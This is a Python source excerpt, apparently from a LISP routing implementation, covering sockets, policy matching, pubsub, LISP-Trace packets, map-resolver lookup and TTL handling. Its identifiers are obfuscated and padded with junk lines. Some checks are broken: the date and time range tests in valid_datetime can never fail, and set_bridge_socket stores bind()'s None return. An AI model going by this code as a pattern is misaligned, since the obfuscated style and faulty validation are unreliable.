if 77 - 77: I1IiiI + OoO0O00 % iIii1I11I1II1 - OOooOOo
if 80 - 80: oO0o % I1ii11iIi11i * I1Ii111 + i1IIi
def set_socket ( self , device ) :
o0 = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
o0 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
o0 . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
o0 . close ( )
o0 = None
if 79 - 79: oO0o + IiII
self . raw_socket = o0
if 4 - 4: iII111i + OoooooooOO / I1Ii111
if 57 - 57: I1IiiI . iIii1I11I1II1 % iII111i * iII111i / I1Ii111
def set_bridge_socket ( self , device ) :
o0 = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
o0 = o0 . bind ( ( device , 0 ) )
self . bridge_socket = o0
except :
return
if 30 - 30: O0 / I11i % OoOoOO00 * I1Ii111 / O0 % ooOoO0o
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
class lisp_datetime ( ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
def valid_datetime ( self ) :
OO00000 = self . datetime_name
if ( OO00000 . find ( ":" ) == - 1 ) : return ( False )
if ( OO00000 . find ( "-" ) == - 1 ) : return ( False )
OOoOooOOO0 , OO0oo00o , i1ii1I1i11 , time = OO00000 [ 0 : 4 ] , OO00000 [ 5 : 7 ] , OO00000 [ 8 : 10 ] , OO00000 [ 11 : : ]
if 54 - 54: OoooooooOO . iIii1I11I1II1 + iIii1I11I1II1
if ( ( OOoOooOOO0 + OO0oo00o + i1ii1I1i11 ) . isdigit ( ) == False ) : return ( False )
if ( OO0oo00o < "01" and OO0oo00o > "12" ) : return ( False )
if ( i1ii1I1i11 < "01" and i1ii1I1i11 > "31" ) : return ( False )
if 11 - 11: Ii1I * OoO0O00 % I1ii11iIi11i
oo0o00O0oO , i11IiII1 , Oooo000O = time . split ( ":" )
if 49 - 49: OoOoOO00 - O0 % I11i - ooOoO0o * OOooOOo
if ( ( oo0o00O0oO + i11IiII1 + Oooo000O ) . isdigit ( ) == False ) : return ( False )
if ( oo0o00O0oO < "00" and oo0o00O0oO > "23" ) : return ( False )
if ( i11IiII1 < "00" and i11IiII1 > "59" ) : return ( False )
if ( Oooo000O < "00" and Oooo000O > "59" ) : return ( False )
return ( True )
if 58 - 58: OoooooooOO - OOooOOo * oO0o / Ii1I . IiII
if 50 - 50: IiII . OOooOOo + I1ii11iIi11i - OoooooooOO
def parse_datetime ( self ) :
IIi1iii1i1 = self . datetime_name
IIi1iii1i1 = IIi1iii1i1 . replace ( "-" , "" )
IIi1iii1i1 = IIi1iii1i1 . replace ( ":" , "" )
self . datetime = int ( IIi1iii1i1 )
if 29 - 29: oO0o / iIii1I11I1II1 % Oo0Ooo * Ii1I
if 49 - 49: OoO0O00 * I11i * iIii1I11I1II1 * I11i - I1IiiI . Oo0Ooo
def now ( self ) :
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
Oo0OO0000oooo = lisp_datetime ( Oo0OO0000oooo )
return ( Oo0OO0000oooo )
if 74 - 74: II111iiii % iII111i * Ii1I % I1ii11iIi11i * II111iiii / i11iIiiIii
if 13 - 13: i1IIi % i1IIi % ooOoO0o + IiII * II111iiii * OOooOOo
def print_datetime ( self ) :
return ( self . datetime_name )
if 66 - 66: iIii1I11I1II1
if 92 - 92: OOooOOo * o0oOOo0O0Ooo - IiII
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 83 - 83: OoO0O00 % I1IiiI % OOooOOo / oO0o + I1IiiI
if 94 - 94: OoOoOO00 . O0
def past ( self ) :
return ( self . future ( ) == False )
if 86 - 86: oO0o % Oo0Ooo . OoooooooOO / OOooOOo / i1IIi
if 65 - 65: Ii1I . OoooooooOO % IiII - o0oOOo0O0Ooo . OOooOOo . II111iiii
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 100 - 100: ooOoO0o / Oo0Ooo + I1ii11iIi11i + OoooooooOO
if 100 - 100: I11i . OOooOOo - II111iiii % I11i % iIii1I11I1II1
def this_year ( self ) :
iIiooo = str ( self . now ( ) . datetime ) [ 0 : 4 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 4 ]
return ( Oo0OO0000oooo == iIiooo )
if 81 - 81: O0 / ooOoO0o * iIii1I11I1II1 . iIii1I11I1II1 / IiII % I11i
if 58 - 58: i11iIiiIii
def this_month ( self ) :
iIiooo = str ( self . now ( ) . datetime ) [ 0 : 6 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 6 ]
return ( Oo0OO0000oooo == iIiooo )
if 25 - 25: I11i % Ii1I
if 13 - 13: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo * iIii1I11I1II1
def today ( self ) :
iIiooo = str ( self . now ( ) . datetime ) [ 0 : 8 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 8 ]
return ( Oo0OO0000oooo == iIiooo )
if 99 - 99: OoooooooOO / II111iiii . I1Ii111
if 62 - 62: OOooOOo . iII111i . I1ii11iIi11i
if 23 - 23: O0
if 33 - 33: ooOoO0o - iII111i % IiII
if 67 - 67: II111iiii
if 66 - 66: iIii1I11I1II1 / OOooOOo
class lisp_policy_match ( ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
class lisp_policy ( ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 67 - 67: I1Ii111
if 94 - 94: I1Ii111 % iIii1I11I1II1 - II111iiii . ooOoO0o + i11iIiiIii - i11iIiiIii
def match_policy_map_request ( self , mr , srloc ) :
for OOo0I111I in self . match_clauses :
iIiiI11II11 = OOo0I111I . source_eid
OooOOo0ooO = mr . source_eid
if ( iIiiI11II11 and OooOOo0ooO and OooOOo0ooO . is_more_specific ( iIiiI11II11 ) == False ) : continue
if 55 - 55: OoooooooOO % iIii1I11I1II1 % I1ii11iIi11i % i1IIi
iIiiI11II11 = OOo0I111I . dest_eid
OooOOo0ooO = mr . target_eid
if ( iIiiI11II11 and OooOOo0ooO and OooOOo0ooO . is_more_specific ( iIiiI11II11 ) == False ) : continue
if 46 - 46: I11i - ooOoO0o . I1IiiI
iIiiI11II11 = OOo0I111I . source_rloc
OooOOo0ooO = srloc
if ( iIiiI11II11 and OooOOo0ooO and OooOOo0ooO . is_more_specific ( iIiiI11II11 ) == False ) : continue
o0000oO = OOo0I111I . datetime_lower
I11I1i1 = OOo0I111I . datetime_upper
if ( o0000oO and I11I1i1 and o0000oO . now_in_range ( I11I1i1 ) == False ) : continue
return ( True )
if 47 - 47: I1IiiI * i11iIiiIii / I1IiiI / iIii1I11I1II1 - Ii1I
return ( False )
if 25 - 25: oO0o / i11iIiiIii + i11iIiiIii % IiII - o0oOOo0O0Ooo
if 97 - 97: I1ii11iIi11i % iII111i * ooOoO0o % OOooOOo . I1IiiI - i11iIiiIii
def set_policy_map_reply ( self ) :
i11oo00oOOOOo = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( i11oo00oOOOOo ) : return ( None )
if 2 - 2: oO0o - OoooooooOO
OooO0ooO0o0OO = lisp_rloc ( )
if ( self . set_rloc_address ) :
OooO0ooO0o0OO . rloc . copy_address ( self . set_rloc_address )
O0o00o000oO = OooO0ooO0o0OO . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( O0o00o000oO ) )
if 44 - 44: I1Ii111
if ( self . set_rloc_record_name ) :
OooO0ooO0o0OO . rloc_name = self . set_rloc_record_name
oOo0oooo = blue ( OooO0ooO0o0OO . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( oOo0oooo ) )
if 98 - 98: I1IiiI % OOooOOo % iII111i
if ( self . set_geo_name ) :
OooO0ooO0o0OO . geo_name = self . set_geo_name
oOo0oooo = OooO0ooO0o0OO . geo_name
iIiii1 = "" if lisp_geo_list . has_key ( oOo0oooo ) else "(not configured)"
if 23 - 23: i11iIiiIii % OoO0O00 - o0oOOo0O0Ooo + OoooooooOO
lprint ( "Policy set-geo-name '{}' {}" . format ( oOo0oooo , iIiii1 ) )
if 12 - 12: Ii1I / I1IiiI . oO0o . I1IiiI + ooOoO0o - II111iiii
if ( self . set_elp_name ) :
OooO0ooO0o0OO . elp_name = self . set_elp_name
oOo0oooo = OooO0ooO0o0OO . elp_name
iIiii1 = "" if lisp_elp_list . has_key ( oOo0oooo ) else "(not configured)"
if 6 - 6: Oo0Ooo + Oo0Ooo - OoOoOO00 - II111iiii
lprint ( "Policy set-elp-name '{}' {}" . format ( oOo0oooo , iIiii1 ) )
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
if ( self . set_rle_name ) :
OooO0ooO0o0OO . rle_name = self . set_rle_name
oOo0oooo = OooO0ooO0o0OO . rle_name
iIiii1 = "" if lisp_rle_list . has_key ( oOo0oooo ) else "(not configured)"
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
lprint ( "Policy set-rle-name '{}' {}" . format ( oOo0oooo , iIiii1 ) )
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
if ( self . set_json_name ) :
OooO0ooO0o0OO . json_name = self . set_json_name
oOo0oooo = OooO0ooO0o0OO . json_name
iIiii1 = "" if lisp_json_list . has_key ( oOo0oooo ) else "(not configured)"
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
lprint ( "Policy set-json-name '{}' {}" . format ( oOo0oooo , iIiii1 ) )
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
return ( OooO0ooO0o0OO )
if 98 - 98: I11i % OoO0O00 . iII111i - o0oOOo0O0Ooo
if 92 - 92: I11i
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 34 - 34: I1IiiI % iIii1I11I1II1 . I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 / O0
if 98 - 98: iII111i % IiII + OoO0O00
if 23 - 23: OOooOOo
class lisp_pubsub ( ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
if 83 - 83: I1ii11iIi11i / O0 * II111iiii + IiII + Oo0Ooo
if 99 - 99: II111iiii + O0
def add ( self , eid_prefix ) :
oo0OOoOO0 = self . ttl
I111o0oooO00o0 = eid_prefix . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( I111o0oooO00o0 ) == False ) :
lisp_pubsub_cache [ I111o0oooO00o0 ] = { }
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
OooOooOO0000 = lisp_pubsub_cache [ I111o0oooO00o0 ]
if 88 - 88: Oo0Ooo . iII111i
O000Oo = "Add"
if ( OooOooOO0000 . has_key ( self . xtr_id ) ) :
O000Oo = "Replace"
del ( OooOooOO0000 [ self . xtr_id ] )
if 22 - 22: Oo0Ooo + O0 + OoO0O00
OooOooOO0000 [ self . xtr_id ] = self
if 83 - 83: i1IIi + OoooooooOO * IiII
I111o0oooO00o0 = green ( I111o0oooO00o0 , False )
oo0O0oO0o = red ( self . itr . print_address_no_iid ( ) , False )
oOo0 = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( O000Oo , I111o0oooO00o0 ,
oo0O0oO0o , oOo0 , oo0OOoOO0 ) )
if 65 - 65: II111iiii / I1Ii111 + I1IiiI - OoooooooOO + ooOoO0o - I1ii11iIi11i
if 29 - 29: OoOoOO00 / OOooOOo / OoO0O00
def delete ( self , eid_prefix ) :
I111o0oooO00o0 = eid_prefix . print_prefix ( )
oo0O0oO0o = red ( self . itr . print_address_no_iid ( ) , False )
oOo0 = "0x" + lisp_hex_string ( self . xtr_id )
if ( lisp_pubsub_cache . has_key ( I111o0oooO00o0 ) ) :
OooOooOO0000 = lisp_pubsub_cache [ I111o0oooO00o0 ]
if ( OooOooOO0000 . has_key ( self . xtr_id ) ) :
OooOooOO0000 . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( I111o0oooO00o0 ,
oo0O0oO0o , oOo0 ) )
if 95 - 95: ooOoO0o
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
if 32 - 32: OoOoOO00 % i11iIiiIii
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
if 44 - 44: I1Ii111 + ooOoO0o
if 15 - 15: I11i + OoO0O00 + OoOoOO00
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if 13 - 13: I1ii11iIi11i * II111iiii
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
if 53 - 53: I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
if 64 - 64: ooOoO0o
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
if 26 - 26: O0 % Oo0Ooo + ooOoO0o - Ii1I . Oo0Ooo
class lisp_trace ( ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 33 - 33: I1Ii111 / iII111i . I1Ii111 % II111iiii
if 52 - 52: I1ii11iIi11i
def print_trace ( self ) :
Ii1I1II = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( Ii1I1II ) )
if 100 - 100: OoooooooOO * i1IIi % iII111i + I1ii11iIi11i - iIii1I11I1II1
if 57 - 57: Ii1I % iII111i
def encode ( self ) :
i1IiIiiiii11 = socket . htonl ( 0x90000000 )
ii1i1II = struct . pack ( "II" , i1IiIiiiii11 , 0 )
ii1i1II += struct . pack ( "Q" , self . nonce )
ii1i1II += json . dumps ( self . packet_json )
return ( ii1i1II )
if 69 - 69: I1Ii111 * oO0o * I1IiiI
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
def decode ( self , packet ) :
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 )
if ( ( i1IiIiiiii11 & 0xff000000 ) != 0x90000000 ) : return ( False )
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
if ( len ( packet ) < oO0o00O ) : return ( False )
O0o00o000oO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if 52 - 52: OoooooooOO
O0o00o000oO = socket . ntohl ( O0o00o000oO )
IiIi = O0o00o000oO >> 24
OOOoOOO0 = ( O0o00o000oO >> 16 ) & 0xff
o00iIIiii1iiII1i = ( O0o00o000oO >> 8 ) & 0xff
Ii11Ii1IiiIi = O0o00o000oO & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( IiIi , OOOoOOO0 , o00iIIiii1iiII1i , Ii11Ii1IiiIi )
self . local_port = str ( i1IiIiiiii11 & 0xffff )
if 89 - 89: iIii1I11I1II1 / O0
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
self . nonce = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 64 - 64: OoooooooOO + Ii1I - Ii1I
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 67 - 67: II111iiii . Ii1I + I1IiiI
return ( True )
if 77 - 77: O0 % I1ii11iIi11i + i11iIiiIii . OOooOOo % o0oOOo0O0Ooo + OoO0O00
if 31 - 31: ooOoO0o * I1ii11iIi11i
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 23 - 23: OoOoOO00 - I11i . iIii1I11I1II1
if 87 - 87: OoO0O00 - i11iIiiIii / O0 % OOooOOo % OOooOOo * i1IIi
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
OooO0ooO0o0OO , IIi1I1iII111 = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( OooO0ooO0o0OO == None ) :
OooO0ooO0o0OO , IIi1I1iII111 = rts_rloc . split ( ":" )
IIi1I1iII111 = int ( IIi1I1iII111 )
lprint ( "Send LISP-Trace to address {}:{}" . format ( OooO0ooO0o0OO , IIi1I1iII111 ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( OooO0ooO0o0OO ,
IIi1I1iII111 ) )
if 18 - 18: IiII
if 50 - 50: i1IIi / o0oOOo0O0Ooo * OoO0O00
if ( lisp_socket == None ) :
o0 = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
o0 . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
o0 . sendto ( packet , ( OooO0ooO0o0OO , IIi1I1iII111 ) )
o0 . close ( )
else :
lisp_socket . sendto ( packet , ( OooO0ooO0o0OO , IIi1I1iII111 ) )
if 98 - 98: I11i . II111iiii
if 13 - 13: oO0o - I11i % II111iiii
if 30 - 30: ooOoO0o / O0 . I11i + I1ii11iIi11i % O0 . I1IiiI
def packet_length ( self ) :
O0OO0ooO00 = 8 ; iIi111I1 = 4 + 4 + 8
return ( O0OO0ooO00 + iIi111I1 + len ( json . dumps ( self . packet_json ) ) )
if 98 - 98: o0oOOo0O0Ooo % O0 - i11iIiiIii
if 49 - 49: o0oOOo0O0Ooo / OoOoOO00 + iII111i
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
iII1 = self . local_rloc + ":" + self . local_port
Oooo0oOOO0 = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ iII1 ] = Oooo0oOOO0
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( iII1 , Oooo0oOOO0 ) )
if 85 - 85: I1IiiI - o0oOOo0O0Ooo
if 86 - 86: II111iiii + Ii1I * Ii1I
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
iII1 = local_rloc_and_port
try : Oooo0oOOO0 = lisp_rtr_nat_trace_cache [ iII1 ]
except : Oooo0oOOO0 = ( None , None )
return ( Oooo0oOOO0 )
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
if 86 - 86: Ii1I
if 69 - 69: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 1 - 1: Ii1I
if 43 - 43: o0oOOo0O0Ooo
if 78 - 78: I1Ii111 % i1IIi * I11i
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
if 77 - 77: I11i . IiII / OoO0O00 / I1Ii111
if 8 - 8: o0oOOo0O0Ooo + iII111i / OoO0O00 * ooOoO0o - oO0o . iII111i
if 32 - 32: OoooooooOO . I1Ii111 - I1ii11iIi11i
def lisp_get_map_server ( address ) :
for Ii1IIII in lisp_map_servers_list . values ( ) :
if ( Ii1IIII . map_server . is_exact_match ( address ) ) : return ( Ii1IIII )
if 29 - 29: OoO0O00
return ( None )
if 33 - 33: I1ii11iIi11i - O0
if 72 - 72: Oo0Ooo * iII111i - I11i
if 81 - 81: I1Ii111
if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
if 46 - 46: OOooOOo * iIii1I11I1II1
if 33 - 33: OoO0O00 * II111iiii / i1IIi
if 93 - 93: I1Ii111 % I11i
def lisp_get_any_map_server ( ) :
for Ii1IIII in lisp_map_servers_list . values ( ) : return ( Ii1IIII )
return ( None )
if 64 - 64: I1IiiI % OoOoOO00 / Oo0Ooo
if 40 - 40: Ii1I + iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
if 49 - 49: IiII - OOooOOo * OOooOOo . O0
if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
if 61 - 61: OoO0O00
if 100 - 100: OoOoOO00
if 97 - 97: OoooooooOO
if 91 - 91: o0oOOo0O0Ooo / O0 % OoO0O00
if 35 - 35: iII111i % OoO0O00 * O0
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
O0o00o000oO = address . print_address ( )
ii1 = None
for iII1 in lisp_map_resolvers_list :
if ( iII1 . find ( O0o00o000oO ) == - 1 ) : continue
ii1 = lisp_map_resolvers_list [ iII1 ]
if 37 - 37: OOooOOo
return ( ii1 )
if 100 - 100: Oo0Ooo * I1IiiI . ooOoO0o
if 53 - 53: OOooOOo + o0oOOo0O0Ooo * Ii1I + O0
if 75 - 75: OoooooooOO
if 24 - 24: I1Ii111 % i11iIiiIii % oO0o . OOooOOo % IiII
if 23 - 23: o0oOOo0O0Ooo * II111iiii - Oo0Ooo - I1IiiI
if 86 - 86: I1IiiI - II111iiii * II111iiii * oO0o % OoooooooOO * OoOoOO00
if 93 - 93: I1IiiI + OoO0O00 % O0 - ooOoO0o * i1IIi
if ( eid == "" ) :
oo000i1I1IIiiIi1 = ""
elif ( eid == None ) :
oo000i1I1IIiiIi1 = "all"
else :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( eid , False )
oo000i1I1IIiiIi1 = "all" if o00o0oOo0o0O == None else o00o0oOo0o0O . use_mr_name
if 3 - 3: i1IIi % oO0o
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
I1Iii = None
for ii1 in lisp_map_resolvers_list . values ( ) :
if ( oo000i1I1IIiiIi1 == "" ) : return ( ii1 )
if ( ii1 . mr_name != oo000i1I1IIiiIi1 ) : continue
if ( I1Iii == None or ii1 . last_used < I1Iii . last_used ) : I1Iii = ii1
if 5 - 5: II111iiii
return ( I1Iii )
if 100 - 100: O0 * iIii1I11I1II1 - OoooooooOO
if 41 - 41: OoO0O00 / OoooooooOO
if 61 - 61: ooOoO0o
if 4 - 4: Oo0Ooo + oO0o + oO0o
if 79 - 79: OoooooooOO
if 98 - 98: O0 . ooOoO0o * I1Ii111
if 98 - 98: ooOoO0o + o0oOOo0O0Ooo / I11i - Ii1I * II111iiii + i1IIi
if 10 - 10: oO0o
def lisp_get_decent_map_resolver ( eid ) :
OO000o00 = lisp_get_decent_index ( eid )
II11Iii11III = str ( OO000o00 ) + "." + lisp_decent_dns_suffix
if 33 - 33: Oo0Ooo % iIii1I11I1II1 - OoO0O00 - i1IIi / o0oOOo0O0Ooo
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( II11Iii11III , False ) , eid . print_prefix ( ) ) )
if 6 - 6: Oo0Ooo . IiII . IiII * Ii1I
if 1 - 1: i11iIiiIii
I1Iii = None
for ii1 in lisp_map_resolvers_list . values ( ) :
if ( II11Iii11III != ii1 . dns_name ) : continue
if ( I1Iii == None or ii1 . last_used < I1Iii . last_used ) : I1Iii = ii1
if 91 - 91: I1ii11iIi11i . OoO0O00 / OoO0O00 / I1ii11iIi11i + iII111i
return ( I1Iii )
if 20 - 20: o0oOOo0O0Ooo . I1Ii111 + O0
if 99 - 99: O0 / IiII . oO0o
if 18 - 18: OoooooooOO * OoO0O00 * I1Ii111
if 12 - 12: i11iIiiIii / iIii1I11I1II1 . I11i % I1Ii111 * ooOoO0o % ooOoO0o
if 13 - 13: i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
def lisp_ipv4_input ( packet ) :
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if ( ord ( packet [ 9 ] ) == 2 ) : return ( [ True , packet ] )
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
if 32 - 32: I1Ii111 . OoOoOO00 % OoooooooOO + I1Ii111 * OoO0O00
if 84 - 84: OoOoOO00
if 80 - 80: oO0o
i1I1iI = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( i1I1iI == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
i1I1iI = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( i1I1iI != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 59 - 59: iIii1I11I1II1 / IiII % I1ii11iIi11i + OoO0O00 - I11i % OOooOOo
if 92 - 92: iII111i
if 96 - 96: OoOoOO00 / OoOoOO00 / OoOoOO00 + OoooooooOO + Oo0Ooo
if 91 - 91: OoOoOO00 + II111iiii / I11i * iIii1I11I1II1
if 92 - 92: I1Ii111 - IiII / IiII
if 42 - 42: IiII
if 7 - 7: iIii1I11I1II1
oo0OOoOO0 = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( oo0OOoOO0 == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( oo0OOoOO0 == 1 ) :
dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 35 - 35: IiII + O0 % I1Ii111 - I1ii11iIi11i - i1IIi
return ( [ False , None ] )
if 100 - 100: I1Ii111 + i11iIiiIii - IiII / I1ii11iIi11i / iII111i
if 56 - 56: iII111i
oo0OOoOO0 -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , oo0OOoOO0 ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 91 - 91: Oo0Ooo . I11i . I1ii11iIi11i
if 60 - 60: i11iIiiIii - OOooOOo
if 78 - 78: I1IiiI * ooOoO0o % iIii1I11I1II1 / I1ii11iIi11i
if 61 - 61: I1Ii111 . Ii1I + OoooooooOO
if 98 - 98: OOooOOo . ooOoO0o . OoOoOO00 - I1Ii111 . i1IIi - iIii1I11I1II1
if 89 - 89: II111iiii * I1ii11iIi11i - I1IiiI
if 58 - 58: Ii1I / Oo0Ooo % IiII
def lisp_ipv6_input ( packet ) :
oO00o0oOoo = packet . inner_dest
packet = packet . packet
if 33 - 33: II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - OoOoOO00 % i11iIiiIii
if 60 - 60: iII111i . o0oOOo0O0Ooo
if 56 - 56: I1ii11iIi11i
if 89 - 89: Oo0Ooo + I1ii11iIi11i * o0oOOo0O0Ooo * oO0o % O0 % OoO0O00
if 70 - 70: o0oOOo0O0Ooo + O0 % I1IiiI
oo0OOoOO0 = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( oo0OOoOO0 == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( oo0OOoOO0 == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 56 - 56: Ii1I
return ( None )
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
if 30 - 30: OoO0O00 + OoooooooOO
if 98 - 98: I1ii11iIi11i % I1IiiI
if 9 - 9: o0oOOo0O0Ooo / I1Ii111 % i1IIi - OOooOOo % I1IiiI / I1ii11iIi11i
if ( oO00o0oOoo . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 66 - 66: IiII
if 56 - 56: oO0o + OoooooooOO
oo0OOoOO0 -= 1
